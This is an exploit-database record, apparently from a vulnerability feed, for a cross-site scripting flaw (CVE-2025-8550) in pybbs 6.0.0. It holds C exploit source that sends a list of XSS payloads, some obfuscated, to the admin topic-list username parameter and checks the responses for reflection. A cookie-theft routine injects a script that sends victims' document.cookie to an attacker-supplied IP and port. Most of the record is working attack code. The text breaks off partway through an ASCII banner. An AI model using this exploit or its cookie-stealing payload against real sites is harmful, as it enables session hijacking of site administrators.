{“lastseen”:”2025-08-11T16:26:28″,”description”:”\/ * Exploit Title : atjiu pybbs 6.0.0 – Cross Site Scripting (XSS) * Exploit Author: Byte Reaper * Vendor Homepage: https:\/\/github.com\/atjiu\/pybbs * Tested on: Kali Linux * CVE:…”,”published”:”2025-08-11T00:00:00″,”modified”:”2025-08-11T00:00:00″,”type”:”exploitdb”,”title”:”atjiu pybbs 6.0.0 – Cross Site Scripting (XSS)”,”source”:””,”references”:””,”id”:”EDB-ID:52400″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-8550″],”sourceData”:”\/*\\r\\n * Exploit Title : atjiu pybbs 6.0.0 – Cross Site Scripting (XSS)\\r\\n * Exploit Author: Byte Reaper\\r\\n * Vendor Homepage: https:\/\/github.com\/atjiu\/pybbs\\r\\n * Tested on: Kali Linux\\r\\n * CVE: CVE-2025-8550\\r\\n * ————————————————————————————————————————————\\r\\n *\/\\r\\n\\r\\n#include \\u003cstdio.h\\u003e\\r\\n#include \\u003ccurl\/curl.h\\u003e\\r\\n#include \\u003cpthread.h\\u003e\\r\\n#include \\u003cstring.h\\u003e\\r\\n#include \\u003cstdlib.h\\u003e\\r\\n#include \\”argparse.h\\”\\r\\n#include \\u003ctime.h\\u003e\\r\\n#include \\u003cdirent.h\\u003e\\r\\n#include \\u003cunistd.h\\u003e\\r\\n#include \\u003cctype.h\\u003e\\r\\n#include \\u003carpa\/inet.h\\u003e\\r\\n\\r\\n#define FULL_URL 3500\\r\\n#define FULL_PAYLOAD_URL 9000\\r\\n#define BUFFER_SIZE 6000\\r\\nint selCookie = 0;\\r\\nconst char *cookies = NULL;\\r\\nconst char *baseurl = NULL;\\r\\nconst char *nameFileC= NULL;\\r\\nint cookiesPayload = 0;\\r\\nconst char *ip = NULL;\\r\\nint port = 0;\\r\\nint verbose = 0;\\r\\n\\r\\nint serchServer_alt()\\r\\n{\\r\\n printf(\\”\\\\e[0;35m============================================ [SEARCH PROCESS] ============================================\\\\e[0m\\\\n\\”);\\r\\n\\r\\n const char *nameProcess[] =\\r\\n {\\r\\n \\”python\\”,\\r\\n \\”apache2\\”,\\r\\n \\”python3\\”,\\r\\n \\”mysql\\”,\\r\\n NULL\\r\\n\\r\\n };\\r\\n DIR *d = opendir(\\”\/proc\\”);\\r\\n if (!d) return 1;\\r\\n struct dirent *entry;\\r\\n while ((entry = readdir(d)) != NULL)\\r\\n {\\r\\n if (!isdigit(entry-\\u003ed_name[0])) continue;\\r\\n char cmdpath[256];\\r\\n snprintf(cmdpath, sizeof(cmdpath), \\”\/proc\/%s\/comm\\”, entry-\\u003ed_name);\\r\\n FILE *f = fopen(cmdpath, \\”r\\”);\\r\\n if (!f) continue;\\r\\n char comm[256];\\r\\n if (fgets(comm, sizeof(comm), f))\\r\\n {\\r\\n for (int i = 0; nameProcess[i]; i++)\\r\\n {\\r\\n if (strstr(comm, nameProcess[i]))\\r\\n {\\r\\n printf(\\”\\\\e[0;34m[+] Process found: %s (PID: %s)\\\\e[0m\\\\n\\”, nameProcess[i], entry-\\u003ed_name);\\r\\n closedir(d);\\r\\n return 0;\\r\\n }\\r\\n }\\r\\n }\\r\\n fclose(f);\\r\\n }\\r\\n closedir(d);\\r\\n return 1;\\r\\n printf(\\”\\\\e[0;35m==========================================================================================================\\\\e[0m\\\\n\\”);\\r\\n}\\r\\nvoid exitSyscall()\\r\\n{\\r\\n __asm__ volatile\\r\\n (\\r\\n \\”mov $0x3C, %%rax\\\\n\\\\t\\”\\r\\n \\”xor %%rdi, %%rdi\\\\n\\\\t\\”\\r\\n \\”syscall\\\\n\\\\t\\”\\r\\n :\\r\\n :\\r\\n :\\”rax\\”, \\”rdi\\”\\r\\n );\\r\\n}\\r\\n\\r\\nint checkLen(int len, char *buf, size_t bufcap)\\r\\n{\\r\\n if (len \\u003c 0 || (size_t)len \\u003e= bufcap)\\r\\n {\\r\\n printf(\\”\\\\e[0;31m[-] Len is Long ! \\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[0;31m[-] Len %d\\\\e[0m\\\\n\\”, len);\\r\\n exitSyscall();\\r\\n return 1;\\r\\n }\\r\\n else\\r\\n {\\r\\n printf(\\”\\\\e[0;34m[+] Len Is Not Long (%d).\\\\e[0m\\\\n\\”,len);\\r\\n return 0;\\r\\n\\r\\n }\\r\\n return 0;\\r\\n}\\r\\nvoid nanoSleep(void)\\r\\n{\\r\\n struct timespec ob;\\r\\n ob.tv_sec = 0;\\r\\n ob.tv_nsec = 500 * 1000 * 1000;\\r\\n\\r\\n __asm__ volatile\\r\\n (\\r\\n \\”mov $230, %%rax\\\\n\\\\t\\”\\r\\n \\”mov $1, %%rdi\\\\n\\\\t\\”\\r\\n \\”xor %%rsi, %%rsi\\\\n\\\\t\\”\\r\\n \\”mov %0, %%rdx\\\\n\\\\t\\”\\r\\n \\”xor %%r10, %%r10\\\\n\\\\t\\”\\r\\n \\”syscall\\\\n\\\\t\\”\\r\\n :\\r\\n : \\”r\\”(\\u0026ob)\\r\\n : \\”rax\\”,\\r\\n \\”rdi\\”,\\r\\n \\”rsi\\”,\\r\\n \\”rdx\\”,\\r\\n \\”r10\\”,\\r\\n \\”memory\\”\\r\\n );\\r\\n}\\r\\n\\r\\nconst char *payloads[] =\\r\\n{\\r\\n \\”\\u003cscript\\u003ealert(1)\\u003c\/script\\u003e\\”,\\r\\n \\”\\\\\\”\\u003e\\u003cimg src=x onerror=alert(1)\\u003e\\”,\\r\\n \\”\\u003csvg onload=alert(1)\\u003e\\”,\\r\\n \\”\\u003cbody onload=alert(1)\\u003e\\”,\\r\\n \\”\\u003ciframe src=\\\\\\”javascript:alert(1)\\\\\\”\\u003e\\u003c\/iframe\\u003e\\”,\\r\\n \\”\\u003ca href=\\\\\\”#\\\\\\” onclick=\\\\\\”alert(1)\\\\\\”\\u003eclick\\u003c\/a\\u003e\\”,\\r\\n \\”\\u003cmath\\u003e\\u003cmi xlink:href=\\\\\\”javascript:alert(1)\\\\\\”\\u003eXSS\\u003c\/mi\\u003e\\u003c\/math\\u003e\\”,\\r\\n \\”\\u003csvg\\u003e\\u003cscript\\u003ealert(1)\\u003c\/script\\u003e\\u003c\/svg\\u003e\\”,\\r\\n \\”\\\\\\”\\u003e\\u003ciframe srcdoc=\\\\\\”\\u003cscript\\u003ealert(1)\\u003c\/script\\u003e\\\\\\”\\u003e\\u003c\/iframe\\u003e\\”,\\r\\n \\”\\u003cimg src=\\\\\\”x\\\\\\” onerror=\\\\\\”javascript:alert(1)\\\\\\”\\u003e\\”,\\r\\n \\”\\u003cscript\\u003eeval(String.fromCharCode(97,108,101,114,116,40,49,41))\\u003c\/script\\u003e\\”,\\r\\n \\”\\u003cscript\\u003eFunction(‘al’+’ert(1)’)()\\u003c\/script\\u003e\\”,\\r\\n \\”\\u003cscript\\u003e(([]+[])[+[]]+([][[]]+[])[+!+[]])[1]+”[1]\\u003c\/script\\u003e\\”,\\r\\n \\”\\u003cobject data=\\\\\\”javascript:alert(1)\\\\\\”\\u003e\\u003c\/object\\u003e\\”,\\r\\n \\”\\u003cvideo\\u003e\\u003csource onerror=\\\\\\”alert(1)\\\\\\”\\u003e\\u003c\/video\\u003e\\”,\\r\\n \\”\\u003clink rel=\\\\\\”stylesheet\\\\\\” href=\\\\\\”javascript:alert(1)\\\\\\”\\u003e\\”,\\r\\n \\”\\u003cform onformdata=alert(1)\\u003e\\u003cinput\\u003e\\u003c\/form\\u003e\\”,\\r\\n \\”\\u003cisindex type=image src=1 onerror=alert(1)\\u003e\\”,\\r\\n \\”\\u003cdetails open ontoggle=alert(1)\\u003e\\”,\\r\\n \\”\\u003cimg src=x onerror=\\u0026#x61;\\u0026#x6C;\\u0026#x65;\\u0026#x72;\\u0026#x74;(1)\\u003e\\”,\\r\\n \\”javascript:alert`1`\\”,\\r\\n \\”javas\\u0026#x63;ript:alert(1)\\”,\\r\\n \\”\\u003cscript src=data:text\/javascript,alert(1)\\u003e\\u003c\/script\\u003e\\”,\\r\\n NULL\\r\\n};\\r\\n\\r\\nconst char *wordPayloadXss[] =\\r\\n{\\r\\n \\”\\u003cscript\\u003e\\”,\\r\\n \\”onerror=\\”,\\r\\n \\”onload=\\”,\\r\\n \\”alert(\\”,\\r\\n \\”javascript:\\”,\\r\\n \\”\\u003csvg\\”,\\r\\n \\”fetch(\\”,\\r\\n \\”document.cookie\\”,\\r\\n \\”srcdoc=\\”,\\r\\n NULL\\r\\n};\\r\\n\\r\\nstruct Mem\\r\\n{\\r\\n char *buffer;\\r\\n size_t len;\\r\\n};\\r\\nsize_t write_cb(void *ptr,\\r\\n size_t size,\\r\\n size_t nmemb,\\r\\n void *userdata)\\r\\n{\\r\\n size_t total = size * nmemb;\\r\\n struct Mem *m = (struct Mem *)userdata;\\r\\n char *tmp = realloc(m-\\u003ebuffer, m-\\u003elen + total + 1);\\r\\n if (tmp == NULL)\\r\\n {\\r\\n fprintf(stderr, \\”\\\\e[1;31m[-] Failed to allocate memory!\\\\e[0m\\\\n\\”);\\r\\n exitSyscall();\\r\\n }\\r\\n m-\\u003ebuffer = tmp;\\r\\n memcpy(\\u0026(m-\\u003ebuffer[m-\\u003elen]), ptr, total);\\r\\n m-\\u003elen += total;\\r\\n m-\\u003ebuffer[m-\\u003elen] = ‘\\\\0’;\\r\\n return total;\\r\\n}\\r\\n\\r\\n\\r\\nvoid cookieSend(const char *ipServer, int portY, const char *urlCP)\\r\\n{\\r\\n CURL *curl = curl_easy_init();\\r\\n CURLcode res;\\r\\n struct Mem responsePayload ;\\r\\n responsePayload.buffer = NULL;\\r\\n responsePayload.len = 0;\\r\\n printf(\\”\\\\e[0;35m================================================================ [COOKIE PAYLOAD] ================================================================\\\\e[0m\\\\n\\”);\\r\\n\\r\\n if (curl == NULL)\\r\\n {\\r\\n printf(\\”\\\\e[0;31m[-] Error Create Object CURL !\\\\e[0m\\\\n\\”);\\r\\n exitSyscall();\\r\\n }\\r\\n\\r\\n if (curl)\\r\\n {\\r\\n char full[FULL_PAYLOAD_URL];\\r\\n if (!port)\\r\\n {\\r\\n portY = 80;\\r\\n printf(\\”\\\\e[0;34m[+] Default Port -\\u003e %d\\\\e[0m\\\\n\\”, portY);\\r\\n }\\r\\n unsigned long format;\\r\\n format = inet_addr(ipServer);\\r\\n if (format == INADDR_NONE)\\r\\n {\\r\\n printf(\\”\\\\e[0;31m[-] Invalid IP address string.\\\\e[0m\\\\n\\”);\\r\\n exitSyscall();\\r\\n }\\r\\n else\\r\\n {\\r\\n printf(\\”\\\\e[0;34m[+] IP ADDRESS : %s\\\\e[0m\\\\n\\”, ipServer);\\r\\n }\\r\\n char server[BUFFER_SIZE];\\r\\n if (!server)\\r\\n {\\r\\n fprintf(stderr, \\”\\\\e[0;31m[-] Error allocating memory!\\\\e[0m\\\\n\\”);\\r\\n exitSyscall();\\r\\n }\\r\\n\\r\\n int lenS = snprintf(server, BUFFER_SIZE, \\”\\u003cscript\\u003enew Image().src=’http:\/\/%s:%d\/steal?c=’+encodeURIComponent(document.cookie);\\u003c\/script\\u003e\\”, ipServer, portY);\\r\\n\\r\\n if (checkLen(lenS, server, BUFFER_SIZE) == 1)\\r\\n {\\r\\n printf(\\”[-] Error write base url in FULL URL !\\\\e[0m\\\\n\\”);\\r\\n exitSyscall();\\r\\n }\\r\\n printf(\\”\\\\e[0;34m[+] Write Your IP And Port successfully in Payload.\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[0;34m[+] Full Payload Format steals cookies : %s\\\\e[0m\\\\n\\”, server);\\r\\n char *encodePayloadCookie = curl_easy_escape(curl, server, strlen(server));\\r\\n if (!encodePayloadCookie)\\r\\n {\\r\\n printf(\\”\\\\e[0;31m[-] Error Encode Payload !\\\\n\\”);\\r\\n exitSyscall();\\r\\n }\\r\\n\\r\\n printf(\\”[+] Encode Payload : %s\\\\n\\”, encodePayloadCookie);\\r\\n int lenSC = snprintf(full, FULL_PAYLOAD_URL, \\”%s\/admin\/topic\/list?startDate=\\u0026endDate=\\u0026username=%s\\”, urlCP, encodePayloadCookie);\\r\\n if (checkLen(lenSC, full, FULL_PAYLOAD_URL) == 1)\\r\\n {\\r\\n printf(\\”\\\\e[0;31m[-] Error write base url in FULL URL !\\\\e[0m\\\\n\\”);\\r\\n exitSyscall();\\r\\n }\\r\\n curl_easy_setopt(curl, CURLOPT_URL, full);\\r\\n\\r\\n if (selCookie)\\r\\n {\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_COOKIEFILE,\\r\\n cookies);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_COOKIEJAR,\\r\\n cookies);\\r\\n\\r\\n }\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_ACCEPT_ENCODING,\\r\\n \\”\\”);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_FOLLOWLOCATION,\\r\\n 1L);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_WRITEFUNCTION,\\r\\n write_cb);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_WRITEDATA,\\r\\n \\u0026responsePayload);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_CONNECTTIMEOUT,\\r\\n 5L);\\r\\n nanoSleep();\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_TIMEOUT,\\r\\n 10L);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_SSL_VERIFYPEER,\\r\\n 0L);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_SSL_VERIFYHOST,\\r\\n 0L);\\r\\n if (verbose)\\r\\n {\\r\\n printf(\\”\\\\e[1;35m——————————————[Verbose Curl]——————————————\\\\e[0m\\\\n\\”);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_VERBOSE,\\r\\n 1L);\\r\\n }\\r\\n struct curl_slist *h = NULL;\\r\\n h = curl_slist_append(h,\\r\\n \\”User-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.9; rv:50.0)\\”);\\r\\n h = curl_slist_append(h,\\r\\n \\”Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8\\”);\\r\\n h = curl_slist_append(h,\\r\\n \\”Accept-Encoding: gzip, deflate, br\\”);\\r\\n h = curl_slist_append(h,\\r\\n \\”Accept-Language: en-US,en;q=0.5\\”);\\r\\n h = curl_slist_append(h,\\r\\n \\”Connection: keep-alive\\”);\\r\\n h = curl_slist_append(h,\\r\\n \\”Upgrade-Insecure-Requests: 1\\”);\\r\\n h = curl_slist_append(h,\\r\\n \\”Cache-Control: max-age=0\\”);\\r\\n curl_easy_setopt(curl, CURLOPT_HTTPHEADER, h);\\r\\n res = curl_easy_perform(curl);\\r\\n curl_slist_free_all(h);\\r\\n curl_free(encodePayloadCookie);\\r\\n if (res == CURLE_OK)\\r\\n {\\r\\n long httpCode = 0;\\r\\n curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE,\\r\\n \\u0026httpCode);\\r\\n printf(\\”\\\\e[1;36m[+] Request sent successfully\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[1;32m-\\u003e Http Code : %ld\\\\e[0m\\\\n\\”, httpCode);\\r\\n if (httpCode \\u003e= 200 \\u0026\\u0026 httpCode \\u003c 300)\\r\\n {\\r\\n printf(\\”\\\\e[0;32m[+] Http Code (200 \\u003c 300) : %ld\\\\e[0m\\\\n\\”,\\r\\n httpCode);\\r\\n printf(\\”\\\\e[0;36m[+] Payload Injection successfully.\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[0;36m[+] Please Check Your Server.\\\\e[0m\\\\n\\”);\\r\\n }\\r\\n else\\r\\n {\\r\\n printf(\\”[-] Payload Injection Failed !\\\\e[0m\\\\n\\”);\\r\\n printf(\\”[-] http Code Not Range (%ld)\\\\e[0m\\\\n\\”, httpCode);\\r\\n }\\r\\n }\\r\\n else\\r\\n {\\r\\n printf(\\”\\\\e[1;31m[-] The request was not sent !\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[1;31m[-] Error : %s\\\\e[0m\\\\n\\”, curl_easy_strerror(res));\\r\\n exitSyscall();\\r\\n\\r\\n }\\r\\n\\r\\n }\\r\\n curl_easy_cleanup(curl);\\r\\n if (responsePayload.buffer)\\r\\n {\\r\\n free(responsePayload.buffer);\\r\\n responsePayload.buffer = NULL;\\r\\n responsePayload.len = 0;\\r\\n }\\r\\n printf(\\”\\\\e[0;35m==================================================================================================================================================\\\\e[0m\\\\n\\”);\\r\\n}\\r\\n\\r\\n\\r\\nint sendRequest(const char *url)\\r\\n{\\r\\n char full[FULL_URL];\\r\\n struct Mem response;\\r\\n CURL *curl = curl_easy_init();\\r\\n if (curl == NULL || !curl)\\r\\n {\\r\\n printf(\\”\\\\e[0;31m[-] Error Create Objetc CURL !\\\\e[0m\\\\n\\”);\\r\\n exitSyscall();\\r\\n }\\r\\n CURLcode res;\\r\\n\\r\\n response.buffer= NULL;\\r\\n response.len = 0;\\r\\n if (response.buffer == NULL \\u0026\\u0026 response.len == 0)\\r\\n {\\r\\n printf(\\”\\\\e[0;33m[+] Clean Response Buffer successfully.\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[0;33m[+] Response Buffer -\\u003e NULL\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[0;33m[+] Response Len -\\u003e 0\\\\e[0m\\\\n\\”);\\r\\n }\\r\\n else\\r\\n {\\r\\n printf(\\”\\\\e[0;31m[-] Cleaning Buffer and len did not work !\\\\e[0m\\\\n\\”);\\r\\n }\\r\\n\\r\\n int finish = 0;\\r\\n for (int p = 0 ; payloads[p] != NULL; p++)\\r\\n {\\r\\n char *encodePayload = curl_easy_escape(curl, payloads[p], strlen(payloads[p]));\\r\\n if (encodePayload == NULL || !encodePayload)\\r\\n {\\r\\n printf(\\”\\\\e[0;31m[-] Error Encode Payload !\\\\n\\”);\\r\\n exitSyscall();\\r\\n }\\r\\n printf(\\”\\\\e[0;34m[+] Encode Payload successfully.\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[0;34m[+] Original Payload : %s\\\\e[0m\\\\n\\”, payloads[p]);\\r\\n printf(\\”\\\\e[0;34m[+] Encode Payload : %s\\\\e[0m\\\\n\\”, encodePayload);\\r\\n\\r\\n int len = snprintf(full, sizeof(full), \\”%s\/admin\/topic\/list?startDate=\\u0026endDate=\\u0026username=%s\\”, url, encodePayload);\\r\\n if (checkLen(len, full, sizeof(full)) == 1)\\r\\n {\\r\\n printf(\\”\\\\e[0;31m[-] Error write base url in FULL URL !\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[0;31m[-] LEN FULL URL : %d\\\\e[0m\\\\n\\”, len);\\r\\n exitSyscall();\\r\\n }\\r\\n printf(\\”[+] FULL URL : %s\\\\n\\”, full);\\r\\n curl_easy_setopt(curl, CURLOPT_URL, full);\\r\\n\\r\\n if (selCookie)\\r\\n {\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_COOKIEFILE,\\r\\n cookies);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_COOKIEJAR,\\r\\n cookies);\\r\\n\\r\\n }\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_ACCEPT_ENCODING,\\r\\n \\”\\”);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_FOLLOWLOCATION,\\r\\n 1L);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_WRITEFUNCTION,\\r\\n write_cb);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_WRITEDATA,\\r\\n \\u0026response);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_CONNECTTIMEOUT,\\r\\n 5L);\\r\\n nanoSleep();\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_TIMEOUT,\\r\\n 10L);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_SSL_VERIFYPEER,\\r\\n 0L);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_SSL_VERIFYHOST,\\r\\n 0L);\\r\\n if (verbose)\\r\\n {\\r\\n printf(\\”\\\\e[1;35m——————————————[Verbose Curl]——————————————\\\\e[0m\\\\n\\”);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_VERBOSE,\\r\\n 1L);\\r\\n }\\r\\n struct curl_slist *h = NULL;\\r\\n h = curl_slist_append(h,\\r\\n \\”Accept: text\/html\\”);\\r\\n h = curl_slist_append(h,\\r\\n \\”Accept-Encoding: gzip, deflate, br\\”);\\r\\n h = curl_slist_append(h,\\r\\n \\”Accept-Language: en-US,en;q=0.5\\”);\\r\\n h = curl_slist_append(h,\\r\\n \\”Connection: keep-alive\\”);\\r\\n curl_easy_setopt(curl, CURLOPT_HTTPHEADER, h);\\r\\n char referer[3500];\\r\\n int refLen = snprintf(referer, sizeof(referer), \\”Referer: %s\\”, full);\\r\\n if (checkLen(refLen, referer, sizeof(referer)) == 1)\\r\\n {\\r\\n printf(\\”\\\\e[0;31m[-] Error write Header Referer Content !\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[0;31m[-] Default Header Referer : http:\/\/exemple.com\\\\e[0m\\\\n\\”);\\r\\n h = curl_slist_append(h,\\r\\n \\”Referer : http:\/\/exemple.com\\”);\\r\\n exitSyscall();\\r\\n }\\r\\n else\\r\\n {\\r\\n printf(\\”\\\\e[0;34m[+] Write Header Referer Content successfully.\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[0;34m[+] Header Referer : %s\\\\e[0m\\\\n\\”, referer);\\r\\n h = curl_slist_append(h,\\r\\n referer);\\r\\n }\\r\\n\\r\\n curl_easy_setopt(curl, CURLOPT_HTTPHEADER, h);\\r\\n res = curl_easy_perform(curl);\\r\\n curl_slist_free_all(h);\\r\\n curl_free(encodePayload);\\r\\n if (res == CURLE_OK)\\r\\n {\\r\\n long httpCode = 0;\\r\\n curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE,\\r\\n \\u0026httpCode);\\r\\n printf(\\”\\\\e[0;37m——————————————————————————————————–\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[1;36m[+] Request sent successfully\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[1;32m-\\u003e Http Code : %ld\\\\e[0m\\\\n\\”, httpCode);\\r\\n if (httpCode \\u003e= 200 \\u0026\\u0026 httpCode \\u003c 300)\\r\\n {\\r\\n printf(\\”\\\\e[0;32m[+] Http Code (200 \\u003c 300) : %ld\\\\e[0m\\\\n\\”,\\r\\n httpCode);\\r\\n if (verbose)\\r\\n {\\r\\n if (response.buffer)\\r\\n {\\r\\n printf(\\”\\\\e[1;37m\\\\n======================================== [Response ] ========================================\\\\e[0m\\\\n\\”);\\r\\n printf(\\”%s\\\\n\\”, response.buffer);\\r\\n printf(\\”\\\\e[1;32m[Len] : %zu\\\\e[0m\\\\n\\”, response.len);\\r\\n printf(\\”\\\\e[1;37m\\\\n=============================================================================================\\\\e[0m\\\\n\\”);\\r\\n }\\r\\n }\\r\\n for (int w = 0; wordPayloadXss[w] != NULL; w++)\\r\\n {\\r\\n if (strstr(response.buffer, wordPayloadXss[w]) != NULL)\\r\\n {\\r\\n printf(\\”\\\\e[0;36m[+] Word Found in Response : %s\\\\n\\”, wordPayloadXss[w]);\\r\\n if (response.buffer)\\r\\n {\\r\\n printf(\\”\\\\e[1;35m==================================== [WORD FOUND RESPONSE] ====================================\\\\e[0m\\\\n\\”);\\r\\n printf(\\”%s\\\\n\\”, response.buffer);\\r\\n printf(\\”\\\\e[1;32m[+] Response Len : %zu\\\\e[0m\\\\n\\”, response.len);\\r\\n printf(\\”\\\\e[1;35m===============================================================================================\\\\e[0m\\\\n\\\\n\\”);\\r\\n\\r\\n }\\r\\n else\\r\\n {\\r\\n printf(\\”[-] Response Is NULL, Exit …\\\\n\\”);\\r\\n exitSyscall();\\r\\n }\\r\\n }\\r\\n else\\r\\n {\\r\\n if (verbose)\\r\\n {\\r\\n printf(\\”\\\\e[0;31m[-] Word Not Found In Response %s\\\\e[0m\\\\n\\”, wordPayloadXss[w]);\\r\\n }\\r\\n if (wordPayloadXss[w] == NULL)\\r\\n {\\r\\n printf(\\”\\\\e[0;31m[-] Not Found Word In Response !\\\\e[0m\\\\n\\”);\\r\\n finish = 1;\\r\\n\\r\\n }\\r\\n }\\r\\n }\\r\\n\\r\\n\\r\\n }\\r\\n else\\r\\n {\\r\\n printf(\\”\\\\e[0;31m[-] Negative response code (%ld)!\\\\e[0m\\\\n\\”, httpCode);\\r\\n }\\r\\n\\r\\n\\r\\n }\\r\\n else\\r\\n {\\r\\n printf(\\”\\\\e[1;31m[-] The request was not sent !\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[1;31m[-] Error : %s\\\\e[0m\\\\n\\”, curl_easy_strerror(res));\\r\\n exitSyscall();\\r\\n\\r\\n }\\r\\n\\r\\n }\\r\\n curl_easy_cleanup(curl);\\r\\n if (response.buffer)\\r\\n {\\r\\n free(response.buffer);\\r\\n response.buffer = NULL;\\r\\n response.len = 0;\\r\\n }\\r\\n return finish;\\r\\n\\r\\n\\r\\n}\\r\\nvoid *thread_routine(void *arg)\\r\\n{\\r\\n int finish = sendRequest((const char *)arg);\\r\\n return (void *)(intptr_t)finish;\\r\\n}\\r\\nvoid runThread(const char *urlT)\\r\\n{\\r\\n int valeuF = sendRequest(urlT);\\r\\n pthread_t thread;\\r\\n for (int u = 0; valeuF == 1; u++)\\r\\n {\\r\\n\\r\\n if (valeuF == 1)\\r\\n {\\r\\n pthread_exit(NULL);\\r\\n }\\r\\n if (pthread_create(\\u0026thread, NULL, thread_routine, (void *)urlT) == 0)\\r\\n {\\r\\n printf(\\”\\\\e[0;32m[+] Pthread Create successfully.\\\\e[0m\\\\n\\”);\\r\\n }\\r\\n else\\r\\n {\\r\\n printf(\\”\\\\e[0;31m[-] Pthread Create Faild !\\\\e[0m\\\\n\\”);\\r\\n }\\r\\n sleep(2);\\r\\n printf(\\”\\\\e[0;32m[+] Sleep 2 s…\\\\n\\”);\\r\\n pthread_cancel(thread);\\r\\n if (pthread_join(thread, NULL) == 0)\\r\\n {\\r\\n printf(\\”\\\\e[0;32m[+] Pthread Join successfully.\\\\e[0m\\\\n\\”);\\r\\n }\\r\\n else\\r\\n {\\r\\n if (verbose)\\r\\n {\\r\\n printf(\\”\\\\e[0;31m[-] Pthread Join Faild !\\\\e[0m\\\\n\\”);\\r\\n }\\r\\n }\\r\\n }\\r\\n}\\r\\nint main(int argc, const char **argv)\\r\\n{\\r\\n printf(\\r\\n \\”\\\\e[0;31m\\”\\r\\n \\”\u2591\u2588\u2588\u2588\u2588\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2591\u2588\u2588\u2588\u2588\u2588\u2588 \u2591\u2588\u2588\u2588\u2588 \u2591\u2588\u2588\u2588\u2588\u2588\u2588 \u2591\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2591\u2588\u2588\u2588\u2588\u2588\u2588 \u2591\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2591\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2591\u2588\u2588\u2588\u2588 \\\\n\\”\\r\\n \\”\u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \\\\n\\”\\r\\n \\”\u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2591\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588\u2588\u2588 \\\\n\\”\\r\\n \\”\u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2591\u2588\u2588\u2588\u2588\u2588\u2588 \u2591\u2588\u2588\u2588\u2588\u2588 \u2591\u2588\u2588\u2591\u2588\u2588\u2591\u2588\u2588 \u2591\u2588\u2588\u2588\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588\u2588\u2588\u2588\u2588 \u2591\u2588\u2588\u2588\u2588\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588\u2591\u2588\u2588\u2591\u2588\u2588 \\\\n\\”\\r\\n \\”\u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588\u2588\u2588 \u2591\u2588\u2588 \\\\n\\”\\r\\n \\”\u2591\u2588\u2588 